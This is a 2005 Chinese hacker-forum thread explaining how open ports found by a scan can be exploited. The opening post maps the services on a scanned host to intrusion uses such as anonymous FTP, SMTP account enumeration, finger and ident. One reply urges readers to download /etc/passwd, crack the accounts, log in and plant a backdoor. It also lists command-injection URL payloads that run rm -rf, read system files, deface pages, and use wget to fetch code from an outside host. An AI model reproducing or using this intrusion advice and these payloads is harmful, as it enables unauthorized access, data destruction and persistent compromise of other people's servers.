标题:
扫描到的端口到底有什么用
[打印本页]
作者:
久木
时间:
2005-10-12 21:33
标题:
扫描到的端口到底有什么用
有许多网友问的最多的问题就是:我用扫描软件扫到了一个机器上的许多开放端口,可是那些端口到底有什么用啊,今天,我就用一个真实的扫描向你讲述扫到的端口的用途。
被扫的主机:192.xxx.xx.x
主机IP数:4
发现的安全漏洞:7个
安全弱点:45个
系统: Standard: Solaris 2.x, Linux 2.1.???, Linux 2.2, MacOS
--------------------------------------------------------------------------------
Telnet (23/tcp)
ssh (22/tcp)
ftp (21/tcp) (发现安全漏油)
netstat (15/tcp)
daytime (13/tcp)
systat (11/tcp)
echo (7/tcp)
time (37/tcp)
smtp (25/tcp)
www (80/tcp) (发现安全漏油)
finger (79/tcp)
auth (113/tcp)
sunrpc (111/tcp)
pop-2 (109/tcp)
linuxconf (98/tcp)
imap2 (143/tcp)
printer (515/tcp)
shell (514/tcp)
login (513/tcp)
exec (512/tcp)
unknown (693/tcp)
unknown (698/tcp)
unknown (727/tcp)
swat (910/tcp)
unknown (1025/tcp)
unknown (1039/tcp)
unknown (1038/tcp)
unknown (1037/tcp)
unknown (1035/tcp)
unknown (1034/tcp)
unknown (3001/tcp)
unknown (6000/tcp)
echo (7/udp)
general/tcp
daytime (13/udp)
unknown (728/udp) (发现安全漏油)
unknown (2049/udp)
unknown (681/udp)
unknown (2049/tcp)(发现安全漏油)
可用telnet登录的端口 (23/tcp)
这个信息表明远程登录服务正在运行,在这里你可以远程登录到该主机,这种不用密码的远程登录服务是危险的,如果可以匿名登录,任何人可以在服务器和客户端之间发送数据。
发现的可攻击弱点 (21/tcp)
我在那里发现了一个目录是可写的:
/incoming
ftp端口 (21/tcp)
ftp服务TELNET服务一样,是可以匿名登录的,而且在有的机器上它还允许你执行远程命令,比如CWD ~XXXX,如果你能CWD ROOT成功,那你就可以获得最高权限了,不过这样的好事好像不多。另外,有时还能用它获得一个可用的帐号(guest),或得知主机在运行什么系统
13/tcP(daytime)
从这里可以得知服务器在全天候运行,这样就有助于一个入侵者有足够的时间获取该主机运行的系统,再加上udp也在全天候的运行,这样可以使入侵者通过UDP欺骗达到主机拒绝服务的目的
ECHO(7/tcp)
这个端口现在没什么用处,但它可能成为一个问题的来源,顺着它有可能找到其它端口以达到拒绝服务的目的。
(25/tcp)smtp端口
该端口开放邮件传输协议
回应可执行EXPN和VRFY命令
EXPN可以发现发送邮件的名称或者能找到一个完整的邮件接收人的名称。
VRFY命令可以用来检测一个帐号的合法性
我们可以试着发这样一个类型的邮件给它:
user@hostname1@victim
我们会收到一个这样的邮件:
user@hostname1
也许我们就能用它穿过防火墙
WWW(80/TCP)端口
它表明WWW服务在该端口运行
finger (79/tcp) 端口
finger服务对入侵者来说是一个非常有用的信息,从它可以获得用户信息,查看机器的运行情况等
auth (113/tcp)
ident服务披露给入侵者的将是较敏感的信息,从它可以得知哪个帐号运行的是什么样的服务,这将有助于入侵者集中精力去获取最有用的帐号(也就是哪些人拥有ROOT权限)
(98/tcp) LINUX在这个端口上运行
对于LINUX我不太熟悉
(513/tcp) RLOGIN在这个端口上运行
这种服务形同于TELNET,任何人可以在它的引导下在客户端和服务端之间传送数据。
exec (512/tcp)
rexecd在该端口开放,该服务使一个破译者有机会从它那里扫描到另外一个IP,或者利用它穿过防火墙。
也许你还能发现很多端口,不同的端口会有不同的作用 。
作者:
lijvnei
时间:
2005-10-24 20:13
标题:
扫描到的端口到底有什么用
怎么没人回复的?
作者:
坏的刚刚好
时间:
2005-10-24 20:47
标题:
扫描到的端口到底有什么用
ftp端口 (21/tcp)
假如在打开的网页里不能写权限,那就把密码档先当下来.
ftp> get /etc/passwd ,然后用小榕的流光提取用户,再找个一个可以利用的shell,就OK了,
用找到的用户名和密码登陆,想干什么就干什么了,建议大家装个后门,因为一般管理员很快就会发现的。
当然,很多主机更离谱的是.anonymous竟然有到根目录和写的权限
(80/tcp)
';cmd.exe';
这是一个windows的shell,一个攻击者如果访问并运行这个脚本,在服务器设置允许的条件下可以在windows机器上做任何事情,很多的蠕虫病毒就是通过80端口,传播到远程的机器上
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
';/bin/id';
这是个2进制的文件,它的问题和/bin/ls一样,如果你在日志中很多地方都看到这种请求,很大的可能性是存在远程执行命令漏洞,但并不一定是个问题,也可能是个错误的警报。
它将显示属于哪个用户和属于哪个组
Example:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id|
http://host/cgi-bin/bad.cgi?doh=id;
';/bin/rm';
这个命令可以删除文件,如果不正确的使用是非常危险的
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm%20-rf%20*|
http://host/cgi-bin/bad.cgi?doh=rm%20-rf%20*;
';wget and tftp'; 命令
这些命令常被攻击者用来下载可能进一步获得特权的文件,wget是unix下的命令,可能被用来下载后门程序,tftp是unix和nt下的命令,用来下载文件。一些IIS蠕虫通过tftp来复制自身传播病毒到其他的主机
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget%20http://host2/Phantasmp.c| http://host/cgi-bin/bad.cgi?doh=wget%20http://www.hwa-security.net/Phantasmp.c;
';cat'; 命令
这个命令用来查看文件内容,常用来读重要的信息,比如配置文件,密码文件,信用卡文件和你能够想到的文件
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat%20/etc/motd| http://host/cgi-bin/bad.cgi?doh=cat%20/etc/motd;
';echo'; 命令
这个命令常用于写数据到文件中,比如“index.html”
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo%20';fc-#kiwis%20was%20here';%20>>%200day.txt| http://host/cgi-bin/bad.cgi?doh=echo%20';fc-#kiwis%20was%20here';%20>>%200day.txt;
等等!!!
作者:
woshihaike
时间:
2005-10-24 21:01
标题:
扫描到的端口到底有什么用
都讲完了,我只好顶了,
作者:
a115075615
时间:
2005-10-24 21:43
标题:
扫描到的端口到底有什么用
好,我收下了,
在这谢谢,各位大虾。还望多发发好贴!
作者:
damnyou
时间:
2005-10-24 23:49
标题:
扫描到的端口到底有什么用
有端口并不能说明一定有漏洞,而没有端口基本就没有漏洞。
就象一个有窗户和门的房子,窗户和门开着,你可以闯进去,偷东西或者干其他什么事。但没有门窗就不可能进去
这只是开始。
欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/)
Powered by Discuz! 7.2